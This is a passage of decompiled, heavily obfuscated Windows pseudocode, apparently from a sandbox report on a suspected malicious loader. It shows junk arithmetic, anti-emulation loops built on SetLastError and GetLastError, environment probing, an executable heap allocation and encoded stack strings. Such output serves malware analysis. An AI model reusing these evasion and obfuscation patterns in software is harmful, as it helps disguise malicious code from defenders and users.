									if( !(0 | _t3640 != 0x00000000) < _t2004) {
										_t2244 =  *0x1000cc8; // 0x1
										_t2004 = _t2244 * 0x86;
										_v52 = _t2004;
									}
								}
							} else {
								_t2723 =  *0x1000d00; // 0xfffff835
								_t3634 = _t2723 -  *0x1000cc0; // 0xffff970a
								if(_t3634 >= 0) {
									goto L60;
								}
							}
						}
						_t3319 = _v36;
						_push(_t3601);
						asm("loopne 0xffffffa3");
						 *(_t2723 + 1) =  *(_t2723 + 1) & _t3319;
						_v168 = _t3319 - 0xef01;
						_v24 = _t2004;
						_t3321 =  *0x1215420;
						 *0x1000cc8 = _t3321;
						asm("cdq");
						 *0x1000ccc = _t2286;
						_t2310 =  *0x11a1ecc;
						_t2006 =  *0x1000c88; // 0xa666078f
						_t3537 = _t3321;
						_t3322 =  *0x1000c8c; // 0xfff500a5
						_v6 = (_v6 & 0x000000ff) -  *0x1000c94;
						_t3579 = 0x8e7;
						do {
							_t2006 = E00ECEE50(_t2310, _t3537, _t2006, _t3322);
							_t3579 = _t3579 - 1;
						} while (_t3579 != 0);
						 *0x1000c88 = _t2006;
						_t2726 =  *0x1000d00; // 0xfffff835
						 *0x1000c8c = _t3322;
						_v36 = _v24 + 0x3ac2;
						_v96 = TlsGetValue(_t2726);
						_t3325 = 0 | _v96 < 0x00000000;
						if(_t3325 != (0 | _v96 - 0x00000054 < 0x00000000)) {
							_t2728 =  *0x1000cc0; // 0xffff970a
							asm("cdq");
							__eflags = _t2728 -  *0x1000c9e;
							if(_t2728 !=  *0x1000c9e) {
								L96:
								_t2013 = 0;
								__eflags = 0;
							} else {
								_t2231 =  *0x1000cc4; // 0xffffffff
								__eflags = _t2231 - _t3325;
								if(_t2231 != _t3325) {
									goto L96;
								} else {
									_t2013 = 1;
								}
							}
							_t3538 = 0;
							__eflags =  !( *0x1000c9f) - _t2013;
							if( !( *0x1000c9f) <= _t2013) {
								_t3466 =  *0x1000cf0; // 0xd43579fe
								_t2226 =  *0x1000cf4; // 0x2b91c
								asm("adc eax, edi");
								 *0x1000ce0 = _t3466 + 0x81b9960;
								_t3468 =  *0x1000c9c; // 0x250000d4
								 *0x1000ce4 = _t2226;
								_t3469 =  *0x1000cac; // 0x106b42
								M01000CB0 = M01000CB0 &  *0x1000cd4 & 0x0000ffff;
								 *0x1000c94 = 2;
								_v7 = (_v7 & 0x000000ff) + _t3468 + 0x79a4;
								_t2228 =  *0x1000ca8; // 0x7b8b5249
								_t2229 = E00ECEE50(_t2228, _t3469, 2, 0);
								_t2230 =  *0x1000c90; // 0xffff571c
								asm("cdq");
								_t2888 = _t2229 + _t2230;
								__eflags = _t2888;
								asm("adc esi, edx");
								 *0x1000ca8 = _t2888;
								 *0x1000cac = _t3469;
							}
						} else {
							_t2232 = 0x261;
							do {
								_v132 = _v132 + 1;
								_t2232 = _t2232 - 1;
							} while (_t2232 != 0);
							_t3538 = 0;
						}
						_v168 = _v24 + 0x7491;
						_t2014 = E00EC1700();
						 *0x1000c9f = _t2014;
						if(_t2014 >= 0) {
							_t2731 =  *0x1000c9c; // 0xd4
							_v48 =  !_v6;
							 *0x1000c98 = _t2731;
						} else {
							_v96 = 2;
							_v48 = (_v48 & 0x0000ffff) + ( *0x1000c9b & 0x000000ff ^ 0x00000048);
							_t3458 = _v144;
							asm("cdq");
							asm("adc edx, esi");
							_v60 = _t3458 + _v60 + _v60;
							asm("adc edx, esi");
							_v56 = _t3458;
							_t2216 = (_v96 & 0x0000ffff) - _t3538;
							 *0x1000c9b = _v164;
							if(_t2216 == 0) {
								_t3460 = _v92;
								 *0x107e6a2 = _t3460;
								asm("cdq");
								 *0x1000d04 = _t3460;
								 *0x1000d00 = _v19 + 0xd3f4;
								_t2880 = _v148 - (_v16 & 0x000000ff);
								__eflags = _t2880;
								_v192 = _t3538;
								if(_t2880 != 0) {
									_t2221 = 0;
									__eflags = 0;
								} else {
									_t2221 = _t2880 + 1;
								}
								 *0x1000cec = _v108 + _t2221;
							} else {
								_t2222 = _t2216 - 1;
								if(_t2222 == 0) {
									_t2224 =  *0x1000c9c; // 0xd4
									 *0x1000cb4 = _v8 +  *0x1000cd8;
									 *0x1000ce8 = _t2224;
									_v11 = _v11 ^  *0x1063470;
								} else {
									if(_t2222 == 1) {
										_v128 =  *0x1215420;
									}
								}
							}
						}
						_t3330 = _v24 + 0x55;
						_v24 = _t3330;
						if(_v5 == 0) {
							_t2732 =  *0x1000c88; // 0xa666078f
							_t2020 =  !_v5;
							asm("cdq");
							__eflags =  !0x00000000 - _t3330;
							_t2734 =  !(_t2732 & 0x00000044);
							if(__eflags > 0) {
								L121:
								__eflags =  *0x1000d20 - _t3538; // 0x530e
								if(__eflags != 0) {
									_t2193 =  *0x1000c84; // 0x52f68420
									asm("cdq");
									_t2194 = E00ECEE50(_t2193, _t3330, 0xceffe103, 0x6d836);
									 *0x1000cf4 = _t3330;
									 *0x1000cf0 = _t2194;
									_v13 = 8;
									_t3448 = (1 -  *0x1000c90) *  *0x1000cf8;
									_t2863 =  *0x1000ca4; // 0x9b27
									 *0x1000cf8 = _t3448;
									asm("cdq");
									asm("sbb edx, esi");
									asm("sbb edx, [0x1000cac]");
									__eflags = M01000CB0 - _t3538; // 0x0
									 *0x1000c88 = (_v14 & 0x000000ff) + ( *0x1000c9b & 0x000000ff) + 0x1fb15881 ^  !_v32 - _t2863 -  *0x1000ca8;
									 *0x1000c8c = 0 ^ _t3448;
									_t3451 = (0 | __eflags == 0x00000000) -  *0x1000cd2;
									__eflags = _t3451;
									_v13 = _t3451;
								}
							} else {
								if(__eflags < 0) {
									L120:
									_v128 =  *0x1000cd0;
									_t2869 =  *0x1000d10; // 0x0
									 *0x1000cd2 =  *0x1000cd2 - _t2869;
									_v48 = (_v48 & 0x0000ffff) * (_v28 & 0x0000ffff);
								} else {
									__eflags = _t2734 - _t2020;
									if(_t2734 >= _t2020) {
										goto L121;
									} else {
										goto L120;
									}
								}
							}
						} else {
							_t3595 = 0x178;
							do {
								_v192 = _t3538;
								if(_v148 != 0) {
									_t2871 = 0;
									__eflags = 0;
								} else {
									_t2871 = 1;
								}
								_v12 = _v124 * _v14 - _t2871 + 0xe;
								_v6 = (_v6 & 0x000000ff) * _v80;
								 *0x1000cc8 =  *0x1215420;
								 *0x1000ccc = _t3538;
								_v14 = _v14 + 1;
								_t3595 = _t3595 - 1;
							} while (_t3595 > _t3538);
						}
						_v11 = E00EC1700();
						if((0 | _v11 == 0x00000000) != (0 | _v11 == 0x00000008)) {
							 *0x1000d18 =  *0x1000d18 + _v116;
							asm("adc [0x1000d1c], edi");
						}
						_t2740 =  *0x1000cc0; // 0xffff970a
						_t3336 =  *0x1000cc4; // 0xffffffff
						_v168 = 0x89cf - (_v168 ^ _v36) - _v36 - _v24;
						_v24 =  *0x1215420;
						 *0x1000c8c = _t3336 >> 3;
						 *0x1000c88 = (_t3336 << 0x00000020 | _t2740) >> 3;
						asm("sbb edx, edx");
						 *0x1000cec =  ~(( *0x1000c98 & 0x0000ffff) *  *0x1000d20) + 1 - ( !((_v6 & 0x000000ff) - _v164) ^ _v19 & 0x000000ff) - M01000CB0 -  *0x1000cf8;
						_v168 = _v24 + 0xe2c6;
						_t2749 =  *0x1215420;
						 *0x1000c9c = _t2749;
						 *0x1000cd0 = _t2749;
						_t2750 =  *0x1000cf0; // -2
						 *0x1000cdc = 2;
						_t2033 = 2 - _t3538;
						_v36 = _v24 + 0x97e5;
						_v8 = _t2750;
						_v5 = 0x76;
						if(2 == 0) {
							_v6 = _v6 + 2 *  *0x1000cc8;
							_t2036 = M01000CB0; // 0x0
							_t3350 = _v92;
							_t2037 = E00ECEE50(_t3350, _v88, _t2036, 0);
							__eflags = _t2037 | _t3350;
							 *0x1000cf4 = _t3538;
							 *0x1000cf0 = 1;
							if((_t2037 | _t3350) != 0) {
								 *0x1000cf0 = _t3538;
							}
							__eflags = _v52;
							_t3354 = ((0 | _v52 == 0x00000000) + ( *0x1000c9b & 0x000000ff)) * ( *0x1000c9b & 0x000000ff);
							__eflags = _t3354;
							_t2040 =  *0x1000cc8; // 0x1
							_v148 = _t3354;
							_t3355 =  *0x1000ccc; // 0x0
							_v6 = E00FFD310(_t2040, 7, _t3355);
						} else {
							if(_t2033 == 1) {
								_t3444 =  *0x1000cd4; // 0x0
								_v40 = _t3444;
								 *0x1000ce8 = _v19 & 0x00004288;
								 *0x1000c9e = 0x4a;
							}
						}
						_v36 = _v24 + 0x2b;
						_v176 = (_v184 | _v176) - (_v36 * 0x0000ab8c | _v36 | _v168) + 0x1cf2d2;
						if((0 | _v13 != ( *0x1000ce8 & 0x0000ffff)) > (0 | _v13 != 0x00000037)) {
							 *0x1000cd8 =  *0x1000cd2 + 0xb5;
							 *0x1000d18 = _v116 * 0x6dd6;
							_t3366 = _v80;
							 *0x1000d1c = _t3538;
							_v80 = _v80 - (_v40 & 0x0000ffff) - _t3366;
							_t375 =  &_v116;
							 *_t375 = _v116 + ( *0x10ad044 & 0x0000ffff);
							__eflags =  *_t375;
						} else {
							_t2182 = _v68;
							_t2856 = _v64;
							_t3662 = _t2182 -  *0x1000cc8; // 0x1
							if(_t3662 != 0) {
								L134:
								_t3366 = 1;
							} else {
								_t3663 = _t2856 -  *0x1000ccc; // 0x0
								if(_t3663 == 0) {
									_t3366 = 0;
									__eflags = 0;
								} else {
									goto L134;
								}
							}
							_t2857 = _v64;
							if(_v68 != 0x49 || _t2857 != _t3538) {
								_t2184 = 1;
							} else {
								_t2184 = 0;
								__eflags = 0;
							}
							if(_t3366 == _t2184) {
								_t2859 = _v9 +  *0x1000d18;
								_t2185 = _v9;
								_t3366 = _t2185 * _t2859 >> 0x20;
								_v9 = _t2185 * _t2859;
								asm("sbb ecx, [0x1000d1c]");
								asm("sbb ecx, [ebp-0x34]");
								_v60 = _v60 -  *0x1000d18 - _v60;
							}
						}
						_t2051 =  *0x1000c9e;
						_t2768 = _v76;
						asm("cdq");
						_t3667 = _t3366 - _v72;
						if(_t3667 < 0 || _t3667 <= 0 && _t2051 < _t2768) {
							_t2052 = 0;
							__eflags = 0;
						} else {
							_t2052 = 1;
						}
						if(_t2052 < (0 |  *0x1000c9e - 0x00000019 >= 0x00000000)) {
							asm("cdq");
							 *0x1000d10 =  *0x1000d10 -  *0x10b67f4;
							 *0x1000cc0 = _t3538;
							asm("sbb [0x1000d14], edx");
							_t3442 = _v136 ^ 0x0000c91a;
							asm("cdq");
							 *0x1000d04 = _t3442;
							 *0x1000ca8 =  *0x1000ca8 + _v92;
							 *0x1000cc4 = _t3538;
							 *0x1000d00 = _t3442 & 0x0000ffff;
							asm("adc [0x1000cac], edx");
						}
						_v24 =  *0x1215420;
						_t2055 = GetSystemDefaultLangID() & 0x0000ffff;
						 *0x1000cdc = _t2055;
						if(_t2055 != _t3538) {
							_v10 = 0;
							_t3672 =  *0x1000cec - _t3538; // 0x9b7c
							 *0x1000ca8 = (_v17 & 0x000000ff & _v128 ^ _v9 & 0x000000ff ^ _v5 & 0x000000ff) * ((_v14 & 0x000000ff ^ (0 | _t3672 == 0x00000000)) - (_v16 & 0x000000ff) * ( *0x1000cf8 & 0x0000ffff));
							_t3436 =  *0x1000cec; // 0x9b7c
							_t2176 =  *0x1000c9c; // 0xd4
							 *0x1000ce8 =  *0x1000ce8 - (_t3436 ^  *0x1000ce8);
							 *0x1000cac = _t3538;
							 *0x1000c9c = (_t2176 - (_v5 & 0x000000ff)) * _t2176;
							if((_v10 & 0x000000ff) == 0) {
								asm("cdq");
								 *0x1000c9f = 0x38;
								_v68 = _v68 -  *0x1000cd0;
								asm("sbb [ebp-0x3c], edx");
								 *0x1000cb4 = 0x91a4;
							}
						}
						_v184 = _v24 + 0x3ec;
						_v176 = _v24 + 0x314;
						 *0x1000cb4 = _v68;
						_t2774 =  *0x1000d08; // 0xd72e
						 *0x1000c9b = _v15;
						_v17 = (_v17 & 0x000000ff) * _t2774;
						_v12 = _v32 * 0x50;
						_v36 = _v24 + 0xcc;
						_t3372 =  *0x1000cb8; // 0x4
						_t2063 =  *0x1000cbc; // 0x0
						_t3373 = _t3372 + 0x16;
						asm("adc eax, edi");
						 *0x1000ce8 =  ~_v132;
						 *0x1000d04 = _t2063;
						_t2778 =  *0x1000d18; // 0x0
						 *0x1000d00 = _t3373;
						asm("cdq");
						_t2065 =  *0x1000d1c; // 0x0
						asm("sbb ebx, edx");
						_t2066 = E00ECEE50(_t2778 - (_v14 & 0x000000ff), _t2065, _t2778, _t2065);
						 *0x1000d1c = _t3373;
						 *0x1000d18 = _t2066;
						 *0x1000c83 = 1;
						 *0x1000cec = 0x6923;
						_v216 = 0xa1;
						_v215 = 0xa2;
						_v214 = 0xa3;
						_v136 = 0x30;
						_v9 =  *0x1000c9f >> 2;
						do {
							_t2781 =  *0x1000cd0;
							 *0x1000cb4 = (_v7 & 0x000000ff) - 0x2e8c;
							_t3676 =  *0x1000cdc - _t2781; // 0x84521e70
							if(_t3676 > 0) {
								_t3376 = _v7 & 0x000000ff;
								_t3585 =  *0x1000cbc; // 0x0
								_t2312 =  *0x1000cb8; // 0x4
								asm("cdq");
								 *0x1000cb8 = E00ECEE50(E00ECEE50(_t3376 & 0x000000ff, _t3376, _t2312, _t3585), _t3376, _t2312, _t3585);
								_t2073 =  *0x1000d10; // 0x0
								__eflags =  *0x1000cd0; // 0x0
								 *0x1000ca4 = _t2073 -  *0x1000ca4;
								 *0x1000cbc = _t3376;
								_t3377 =  *0x1000cc8; // 0x1
								_t2081 = (( !(( *0x1000c83 & 0x000000ff) *  *0x1000d18) -  *0x1000ce8 & 0x0000ffff) - (_v5 & 0x000000ff)) * (_t3377 - (0 | __eflags == 0x00000000) *  *0x1000cd4 & 0x0000ffff);
								__eflags = _t2081;
								_v48 = _t2081;
							} else {
								_t3422 =  *0x1000cb8; // 0x4
								_v44 = IsZoomed(_t3422);
								if(_v44 == 0) {
									_t2839 =  *0x1000cb8; // 0x4
									if((_t2839 |  *0x1000cbc) == 0) {
										(_v10 & 0x000000ff) - _v13 = _v128 -  !((_v10 & 0x000000ff) - _v13 > 0);
										if(_v128 <  !((_v10 & 0x000000ff) - _v13 > 0)) {
											_t2167 =  *0x1000ca8; // 0x7b8b5249
											_t2845 =  *0x1000d18; // 0x0
											 *0x1000c84 =  *0x1000c84 + 1;
											M01000CB0 = _t2167 * 0xc1;
											_v9 = _v9 + _t2845;
										}
									} else {
										_t3426 = M01000CB0; // 0x0
										_v10 = _t3426 & 0x00000009;
										_t2846 =  *0x1000d20; // 0x530e
										_v52 = (_v52 & 0x0000ffff) - _t2846;
										_v124 = 0x4c;
										_v120 = 0;
									}
								}
							}
							_t2314 = ( *(_t3601 + _t3538 - 0xd4) & 0x000000ff) + 0x90;
							_t2084 = E00EC1700();
							M01000CB0 = _t2084;
							if(_t2084 == 0) {
								if(_v8 == 0) {
									__eflags =  *0x1000cd8; // 0x6dc8
									if(__eflags != 0) {
										__eflags = _v6;
										if(_v6 == 0) {
											_v96 = _v96 >>  *0x10ae584;
											 *0x1000ca8 =  *0x1000ca8 + 1;
											asm("adc [0x1000cac], edx");
											__eflags = _v68 | _v64;
											if((_v68 | _v64) != 0) {
												_t2148 = 0;
												__eflags = 0;
											} else {
												_t2148 = 1;
											}
											_t3418 = ((_v18 & 0x000000ff) + (_v9 & 0x000000ff)) * (( *0x1000c83 & 0x000000ff) -  *0x1000cd8) * (( *0x1000ce8 & 0x0000ffff) + _t2148 + 0x514aab80);
											__eflags = _t3418;
											_v80 = _t3418;
										}
									}
								} else {
									_v192 = 0;
									_v176 =  !(_v7 & 0x000000ff) -  *0x1000d00 & 0x0000ffff;
									 *0x1000d20 = _v19 + _v124 & _v176;
									if(_v48 != 0) {
										_t2155 = 0;
										__eflags = 0;
									} else {
										_t2155 = 1;
									}
									_v8 = _v68 + _t2155;
									_t3421 = _v16;
									_t2837 =  *0x1000cf4; // 0x2b91c
									_t2838 =  *0x1000cf0; // 0xd43579fe
									asm("sbb eax, eax");
									_v116 =  ~(_t3421 & 0x000000ff ^ M01000CB0) + 1;
									asm("cdq");
									 *0x1000d18 = E00ECEE50( *0x1000c83 & 0x000000ff, _t3421, _t2838, _t2837);
									_t2162 =  *0x1000c88; // 0xa666078f
									 *0x1000d1c = _t3421;
									_v140 = _v140 + _t2162 + 0xbe075b36;
								}
							}
							_t3383 = _v36;
							 *((short*)(_t3601 + _t3538 * 2 - 0x150)) = (_v36 + _v184) * _t3383 * 0x3a4 + (_t2314 & 0x000000ff) + 0x7180;
							_t3538 = _t3538 + 1;
						} while (_t3538 < 3);
						_t2087 = E00EC1700();
						asm("cdq");
						 *0x1000ca8 = _t2087;
						 *0x1000cac = _t3383;
						if((_t2087 | _t3383) == 0 || _t2087 != 5 || _t3383 != 0) {
							_t3383 = _v100;
							if(_t3383 >  !_v140) {
								_t2817 =  *0x1000d00; // 0xfffff835
								asm("cdq");
								_t2134 =  *0x1000d04; // 0xffffffff
								asm("sbb edi, edx");
								 *0x1000d04 = _t2134 | _t2134;
								 *0x1000d00 = _t2817 | _t2817 - _v11;
								if((_v124 ^  *0x1000c88 | _v120 ^  *0x1000c8c) != 0) {
									_t2139 = 0;
									__eflags = 0;
								} else {
									_t2139 = 1;
								}
								 *0x1000d20 =  !( !(_v12 & 0x000000ff) * _t2139) + (_v7 & 0x000000ff);
								_v128 = _v128 - (_v128 &  *0x1000c9a);
								_t2142 =  *0x1000cc0; // 0xffff970a
								_t2823 =  *0x1000cc4; // 0xffffffff
								_t3383 =  *0x1215420;
								_v68 = _t2142 + 0xffffff1b;
								asm("adc ecx, 0xffffffff");
								_v64 = _t2823;
								_v108 = _t3383;
								_v104 = 0;
							}
						}
						_v334 = 0;
						_t2090 = E00EC1700();
						asm("cdq");
						_v108 = _t2090;
						_v104 = _t3383;
						if((_v108 | _v104) == 0) {
							_v8 = (_v13 & 0x000000ff) + 0x26268ad6;
							_t3405 = _v132;
							asm("cdq");
							 *0x1000ca8 =  *0x1000ca8 + E00ECEE50(_t3405 & 0x0000ffff, _t3405, 0xb4ace0f7, 0x43a22);
							_t2131 = M01000CB0; // 0x0
							asm("adc [0x1000cac], edx");
							 *0x11302b8 = _t2131;
							asm("cdq");
							 *0x1000cbc = _t3405;
							_t3406 =  *0x1000ce8; // 0x4
							 *0x1000cb8 =  *0x1000c9b & 0x000000ff;
							_v17 = (_v17 & 0x000000ff) + _t3406;
						}
						asm("sbb eax, eax");
						_t3384 = _v13;
						if( ~( *0x1000c9b & 0x000000ff) == _t3384) {
							__eflags = _v8 - 0x27dc2ea9;
							if(_v8 > 0x27dc2ea9) {
								_v18 = ( *0x1000cec & 0x0000ffff) - (_v18 == 0);
								_t3389 = _v12 & 0x000000ff;
								__eflags = ( *0x1000cec & 0x0000ffff) - (_v18 == 0) > 0 - _t3389;
								if(( *0x1000cec & 0x0000ffff) - (_v18 == 0) > 0 == _t3389) {
									__eflags = _v14;
									if(_v14 != 0) {
										_v16 =  *0x1215420 & 0x000000ff;
										__eflags = _v5 & 0x000000ff;
										_v11 =  !(((0 | (_v5 & 0x000000ff) == 0x00000000) + (_v32 & 0x0000ffff)) * (_v12 & 0x000000ff)) - (_v7 & 0x000000ff) - _v112 + (_v96 & 0x0000ffff);
										asm("cdq");
										_v92 = _v92 - ( *0x1000cec & 0x0000ffff);
										asm("sbb [ebp-0x54], edx");
									}
								} else {
									_t2122 = _v96 +  *0x1000cc0 + 0x43;
									 *0x1000c9e = _t2122;
									asm("cdq");
									_v6 =  *0x1000c9f >> 7;
									 *0x1000d00 = _t2122;
									 *0x1000d04 = _t3389;
								}
							} else {
								 *0x1000c9b = _v96 >> 1;
								 *0x1000c94 =  *0x10bd9dc;
							}
						} else {
							_t2127 = E00EC1000();
							asm("cdq");
							 *0x1000c88 = _t2127 & 0x000000ff;
							 *0x1000c8c = _t3384;
						}
						_t3391 =  &_v340;
						FoldStringW(0x80, _t3391, 2,  &_v2580, 0x400);
						_t2101 =  *0x1000c94; // 0x0
						asm("sbb edx, edx");
						asm("sbb eax, eax");
						if( ~_t3391 ==  ~_t2101) {
							__eflags =  *0x1000c9f;
							if( *0x1000c9f != 0) {
								_t3393 = _v16;
								_t2104 = _v17 + (_t3393 & 0x000000ff);
								__eflags = _t2104;
								asm("cdq");
								 *0x1000d00 = _t2104;
								 *0x1000d04 = _t3393; // executed
							}
							goto L197;
						} else {
							_t2106 = E00EC1190() & 0x000000ff;
							 *0x1000cd4 = _t2106;
							if(_t2106 <= 0) {
								L197:
								__imp__CoUninitialize(); // executed
							} else {
								 *0x1000cf0 =  *0x1000cf0 + _v116 * 0xfa62;
								_t3395 =  *0x1000ce8 & 0x0000ffff;
								asm("adc dword [0x1000cf4], 0x0");
								asm("cdq");
								asm("cdq");
								asm("adc edx, ebx");
								 *0x1000cb8 = _v96 + _v164 ^ _v40 * _t3395;
								 *0x1000cbc = _t3395 ^ _t3395;
								__imp__CoUninitialize();
							}
						}
						L233:
						_t3512 = 1;
						_t2286 = 0;
					}
				}
				_t2352 =  *0x1000cc0; // 0x970a
				 *0x1000ca0 =  *0x1000ca0 + _t3512;
				 *0x1000c98 = 4;
				_t1461 =  *0x1000c98 & 0x0000ffff;
				 *0x1000d20 = _t2352;
				_v18 = (_v18 & 0x000000ff) -  *0x10ae260;
				if(_t1461 <= 4) {
					switch( *((intOrPtr*)(_t1461 * 4 +  &M00EC7898))) {
						case 0:
							_v52 = _v52 +  *0x1000d10;
							 *0x1000cb4 = (_v28 & 0x0000ffff) * 0x4c87d2ee;
							goto L244;
						case 1:
							 *0x1000c9f =  *0x1000c9f + 0x91;
							__eax = __eax | 0xffffffff;
							 *0x1000ca0 =  *0x1000c9f + 0x91;
							_v108 = _v108 + __eax;
							asm("adc [ebp-0x64], eax");
							__edx = _v116;
							__ecx = _v76;
							__esi = _v72;
							__eax = 0;
							__edx = _v116 + _v76;
							_v76 = _v116 + _v76;
							asm("adc eax, esi");
							_v72 = 0;
							_v9 & 0x000000ff = (_v9 & 0x000000ff) + 0x5c4b70c7;
							_v10 = __dl;
							goto L244;
						case 2:
							 *0x1000cc0 =  *0x1000cc0 -  *0x1000d18;
							__edx =  *0x1000cc4; // 0xffffffff
							asm("sbb edx, [0x1000d1c]");
							__eax = _v76;
							__esi = _v72;
							__eax = _v76 +  *0x1000cc0 -  *0x1000d18;
							asm("adc esi, edx");
							__eax = _v76 +  *0x1000cc0 -  *0x1000d18 | _v72;
							__eflags = __eax;
							if(__eax != 0) {
								__esi = 0;
								__eflags = 0;
							} else {
								_t708 = __eax + 1; // 0x4ab9e449
								__esi = _t708;
							}
							__eax = _v5 & 0x000000ff;
							__ecx = __al;
							__edx = 0;
							0x671b87b8 = 0x671b87b8 - __al;
							__ecx =  *0x1000ca0; // 0x5247
							__eflags = __ecx - __ebx;
							__edx = 0 | __ecx == __ebx;
							(0x671b87b8 - __al) * __edx = (0x671b87b8 - __al) * __edx * __ecx;
							__eax = (0x671b87b8 - __al) * __edx * __ecx - __esi;
							asm("cdq");
							 *0x1000cc8 = (0x671b87b8 - __al) * __edx * __ecx - __esi;
							__eax = _v14 & 0x000000ff;
							__ecx = _v10 & 0x000000ff;
							__eax = (_v14 & 0x000000ff) - 0x96;
							__eax = (_v14 & 0x000000ff) - 0x00000096 | _v10 & 0x000000ff;
							 *0x1000ccc = __edx;
							_v10 = __al;
							__ax = _v132;
							__dl = 0xa6;
							__edx = __eax * 0xa6 >> 0x20;
							__eax = __eax * 0xa6;
							 *0x1000cd2 = __al;
							0xffffb1b4 = 0xffffb1b4 -  *0x1000ca8;
							__ecx = 0xffffffff;
							asm("sbb ecx, [0x1000cac]");
							_v92 = _v92 + 0xffffb1b4 -  *0x1000ca8;
							asm("adc [ebp-0x54], ecx");
							goto L244;
						case 3:
							__eax =  *0x1000d04;
							__ecx =  *0x1000d00; // 0xfffff835
							__ecx = E00ECEE50(__ecx,  *0x1000d04, 2, __ebx);
							__eax =  *0x1000c9f;
							__esi = __edx;
							asm("cdq");
							__ecx = __ecx +  *0x1000c9f;
							asm("adc esi, edx");
							__dl = _v10;
							 *0x1000d00 = __ecx;
							__ax = __dl & 0x000000ff;
							__ecx = 0x188a;
							__ax = (__dl & 0x000000ff) + __cx;
							 *0x1000d04 = __edx;
							_v132 = (__dl & 0x000000ff) + __cx;
							goto L244;
						case 4:
							__edx =  *0x11fa040;
							_v48 = _v48 +  *0x11fa040;
							__eax = _v6 & 0x000000ff;
							__cx = __al;
							__eax =  *0x1000d08 & 0x000000ff;
							__edx = 0x2243;
							__cx = __al + __dx;
							 *0x1000cf8 =  *0x1000cf8 + __cx;
							__edx = __eax *  *0x1000c9e >> 0x20;
							__eflags = __eax;
							 *0x1000c9e = __al;
							goto L244;
					}
				}
				L244:
				SetLastError(0x1d1c);
				_t3544 = 0;
				if(GetLastError() > 0) {
					do {
						 *0x1000cd4 = 1;
						_v8 = _v10 + 0x00000007 | _v8;
						_v136 = 0xb648;
						_t1892 =  *0x1000cd4; // 0x0
						_t1893 = _t1892 - M01000CB0;
						 *0x1000cd4 = _t1893;
						_t1895 = (_t1893 & 0x0000ffff) - _t2286;
						if(_t1895 == 0) {
							_v11 = _v11 & 0x000000e0;
							_t1897 =  *0x1000c9a & 0x000000ff;
							_v100 = _t1897 *  *0x1000c83 >> 0x20;
							_t3263 = (_v144 & 0x0000ffff) * M01000CB0;
							__eflags = _t3263;
							 *0x1000c83 = _t1897 *  *0x1000c83;
							_v144 = _t3263;
						} else {
							if(_t1895 == 1) {
								_v9 = (_v16 & 0x000000ff) - 0xb6;
								 *0x1135858 = _v128;
								_t1917 =  *0x1000cc0; // 0xa
								_v148 = _v148 * ( *0x1000ce8 & 0x0000ffff) ^ _v148;
								_v7 = _t1917 * 0xa1;
								asm("cdq");
								asm("sbb ebx, edx");
								_v108 = _v108 -  *0x1000c9f;
								_t2286 = 0;
							}
						}
						if(_t3544 > 0x19e) {
							 *0x1000d00 =  *0x1000d00 + _v68;
							_t2658 =  *0x1000d10; // 0x0
							asm("adc [0x1000d04], eax");
							_v48 = _t2658 * 0xffff99cc;
							asm("cdq");
							_v108 = _v108 + E00ECEE50(_v108, _v104,  *0x1000cd8, _v68);
							asm("adc [ebp-0x64], edx");
							_t2286 = 0;
							_t3703 =  *0x1000c94 - _t2286; // 0x0
							if(_t3703 == 0) {
								_t2661 =  *0x1000c88; // 0xa666078f
								__eflags = _t2661 |  *0x1000c8c;
								if((_t2661 |  *0x1000c8c) != 0) {
									_t3270 = _v44 + 0x65ae;
									_v32 = _t3270;
									asm("cdq");
									 *0x1000d10 = _v144 + 0x5d05665c;
									 *0x1000d14 = _t3270;
									asm("cdq");
									 *0x1000cb8 =  *0x1000cb8 +  *0x1000cd2;
									asm("adc [0x1000cbc], edx");
								}
							} else {
								_t1914 =  *0x1000d08; // 0xd72e
								_v12 = _t1914 + (_v12 & 0x000000ff);
							}
							SetLastError(_t2286);
						}
						_t1900 =  *0x1000c9a; // -110
						 *0x1000cd2 = _t1900 * 0xf;
						_v12 = _v76 * M01000CB0;
						_t1904 =  *0x1000c90; // 0x571c
						 *0x1000cd4 = _t1904;
						 *0x1000ce8 = _v76 + _v76 + _v76 + _v76;
						GetConsoleCP();
						_t3544 = _t3544 + 1;
					} while (_t3544 < GetLastError());
				}
				_v44 = 1;
				_t2353 =  *0x1000cd0; // 0x8e0000
				 *0x1000c9b = _v8 +  *0x1000cc8;
				_v52 = _t2353 & 0x00005d2e;
				_t1466 = _v44 - _t2286;
				if(_t1466 == 0) {
					_t2356 = _v18 + _v128;
					__eflags = _t2356;
					_v128 = _t2356;
					_v112 = 0x9c643092;
				} else {
					if(_t1466 == 1) {
						_t3256 =  *0x1000cec; // 0x9b7c
						_v15 = _t3256 >> 7;
					}
				}
				_t1468 = HeapCreate(0x40000, _t2286, _t2286); // executed
				_t3545 = _t1468;
				_t1469 = _v76;
				 *0x1000c9e = 0xf8;
				if(_t3545 == _t2286) {
					_t2987 = _v72;
					__eflags =  *0x1000cdc - _t1469;
					if( *0x1000cdc == _t1469) {
						__eflags = 0 - _t2987;
						if(0 == _t2987) {
							_t3556 = 0x20a;
							do {
								 *0x1000cdc =  *0x1000cdc +  *0x112ebd0;
								asm("cdq");
								asm("adc ebx, edx");
								_t3056 = _v124;
								_v124 = E00ECEE50( *0x1000d08 + _v124, _v120, _t3056, _v120);
								_v120 = _t3056;
								_t3058 = (_v15 & 0x000000ff) - (_v16 & 0x000000ff) * 0x618d9f6;
								_v15 = _t3058;
								asm("cdq");
								 *0x1000cb8 = E00ECEE50(E00ECEE50( *0x1000d20, _t3058,  *0x1000cb8,  *0x1000cbc), _t3058, 0x3960af70, 0x99459);
								 *0x1000cbc = _t3058;
								_v112 = _v112 + 1;
								_t3556 = _t3556 - 1;
								__eflags = _t3556;
							} while (_t3556 > 0);
						}
					}
					_v52 = GetMessagePos();
					_v52 - 0x1d = _v52;
					__eflags = (_v52 != 0) - (_v52 != 0x1d);
					if((_v52 != 0) > (_v52 != 0x1d)) {
						_t2287 = 0;
						__eflags =  *0x1000c94;
						if( *0x1000c94 != 0) {
							_v116 = 0x69f4a17b;
						}
					} else {
						_t2287 = 0;
					}
					_v244 = 0x56;
					_v243 = 0x7e;
					_v242 = 0x76;
					_v241 = 0x74;
					_v240 = 0x69;
					_v239 = 0x62;
					_v238 = 0x3b;
					_v237 = 0x7d;
					_v236 = 0x7a;
					_v235 = 0x6e;
					_v234 = 0x77;
					_v233 = 0x6f;
					_t3546 = 0;
					__eflags = 0;
					do {
						_v52 = E00EC1000() & 0x000000ff;
						__eflags = _v52;
						if(_v52 == 0) {
							_t1475 =  *0x1000cdc;
							__eflags = _t1475 - 0x8362;
							if(_t1475 >= 0x8362) {
